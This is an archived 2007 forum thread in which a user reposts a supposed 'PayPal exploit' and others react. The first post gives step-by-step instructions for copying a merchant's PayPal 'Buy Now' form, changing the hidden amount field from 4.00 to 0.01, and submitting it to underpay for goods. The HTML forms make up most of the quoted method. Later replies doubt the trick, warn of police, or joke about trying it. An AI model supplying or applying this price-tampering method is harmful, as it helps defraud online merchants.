Post Reply 
paypal exploit?
apparently....
Author Message
boogschd
boogyman
Worlds End

Posts: 4,954.3196
Threads: 90
Joined: 29th Nov 2007
Reputation: 4.19708
E-Pigs: 43.6852
Offline
Post: #1
paypal exploit?
found this in stumbleupon just now
link

fr33dom.net Wrote:Lets Say you want to buy something from http://www.site.com
and it has the pay with paypal button. The item you want costs lets say 4 dollars.

<form method="post" action="http://www.site.com/process.php">
<input type="hidden" name="amount" value="4.00">
<input type="hidden" name="item_name" value="$4.00 Item">
<input type="hidden" name="item_number" value="1">
<input type="hidden" name="no_note" value="1">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="no_shipping" value="1">
<input type="hidden" name="quantity" value="1">
<input type="hidden" name="bn" value="PP-BuyNowBF">
<input type="hidden" name="cmd" value="_xclick">
<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
</form>



You can find that in source.
Now all you do is.
copy that put it into a new HTML document and edit it to

<form method="post" action="http://www.site.com/process.php">
<input type="hidden" name="amount" value="00.01">
<input type="hidden" name="item_name" value="$4.00 Item">
<input type="hidden" name="item_number" value="1">
<input type="hidden" name="no_note" value="1">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="no_shipping" value="1">
<input type="hidden" name="quantity" value="1">
<input type="hidden" name="bn" value="PP-BuyNowBF">
<input type="hidden" name="cmd" value="_xclick">
<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
</form>

i don't have paypal so i can't try it..
but i guess they thought of a way to fix this by this time
(This post was last modified: 03/12/2007 03:34 AM by boogschd.)
03/12/2007 03:33 AM
Visit this user's website Find all posts by this user Quote this message in a reply
S7*
Sweet Dreams

Posts: 16,689.4373
Threads: 1,056
Joined: 3rd Apr 2007
Reputation: 14.29926
E-Pigs: 383.2289
Offline
Post: #2
RE: paypal exploit?
no fudging way D:
03/12/2007 03:53 AM
Find all posts by this user Quote this message in a reply
Hurtween
Paradigmatic Entity

Posts: 176.3311
Threads: 9
Joined: 29th Apr 2007
Reputation: 1.88741
E-Pigs: 7.4466
Offline
Post: #3
RE: paypal exploit?
wowowo wo.

Somebody try this!
03/12/2007 04:15 AM
Find all posts by this user Quote this message in a reply
diego
poof

Posts: 7,826.1659
Threads: 264
Joined: 22nd Jun 2007
Reputation: 1.80067
E-Pigs: 37.4012
Offline
Post: #4
RE: paypal exploit?
thos must be a major glitch in the system.
'this can help you bankrupt paypal.
Don't DO IT

[Image: cce6aa9e-c40c-4ae7-aebe-d7780d6fc009.gif]
03/12/2007 05:32 AM
Find all posts by this user Quote this message in a reply
sticky
Way Of Destruction 33

Posts: 719.3800
Threads: 25
Joined: 16th Mar 2007
Reputation: -1.78625
E-Pigs: 11.3336
Offline
Post: #5
RE: paypal exploit?
must be fake.
03/12/2007 05:34 AM
Find all posts by this user Quote this message in a reply
boogschd
boogyman
Worlds End

Posts: 4,954.3196
Threads: 90
Joined: 29th Nov 2007
Reputation: 4.19708
E-Pigs: 43.6852
Offline
Post: #6
RE: paypal exploit?
for the record... i didnt claim it was real...
(This post was last modified: 03/12/2007 05:37 AM by boogschd.)
03/12/2007 05:37 AM
Visit this user's website Find all posts by this user Quote this message in a reply
sticky
Way Of Destruction 33

Posts: 719.3800
Threads: 25
Joined: 16th Mar 2007
Reputation: -1.78625
E-Pigs: 11.3336
Offline
Post: #7
RE: paypal exploit?
yeah, didnt say you said it but i said you said its just a said that i didnt said it to be a said truth so you said you is not said not never said.
03/12/2007 05:40 AM
Find all posts by this user Quote this message in a reply
ZiNgA BuRgA
Smart Alternative

Posts: 17,022.2988
Threads: 1,174
Joined: 19th Jan 2007
Reputation: -1.71391
E-Pigs: 446.1274
Offline
Post: #8
RE: paypal exploit?
I have doubts such a high profile site would fall for a simple exploit...
Though why they even place those values in the first place in the HTML is somewhat beyond me...

Nice find though - feel free to try it! XD
(This post was last modified: 03/12/2007 05:57 AM by ZiNgA BuRgA.)
03/12/2007 05:57 AM
Visit this user's website Find all posts by this user Quote this message in a reply
sticky
Way Of Destruction 33

Posts: 719.3800
Threads: 25
Joined: 16th Mar 2007
Reputation: -1.78625
E-Pigs: 11.3336
Offline
Post: #9
RE: paypal exploit?
and expect police knocking the door of the one who did it and got caught. =P
03/12/2007 06:06 AM
Find all posts by this user Quote this message in a reply
YoYoBallz
L4YoY0s

Posts: 6,057.4567
Threads: 644
Joined: 3rd Mar 2007
Reputation: 15.01961
E-Pigs: 13327.7533
Offline
Post: #10
RE: paypal exploit?
sticky Wrote:and expect police knocking the door of the one who did it and got caught. =P
lol yeah

<Myth0s> i love boys
-------------------------------------------------------------------
I Go To Earth When Mars Is Boring.
-------------------------------------------------------------------
¿ʞɔпɟ əɥʇ ʇɐɥʍ I was first EPerson to have upside down title.
-------------------------------------------------------------------
03/12/2007 10:30 AM
Find all posts by this user Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)

 Quick Theme: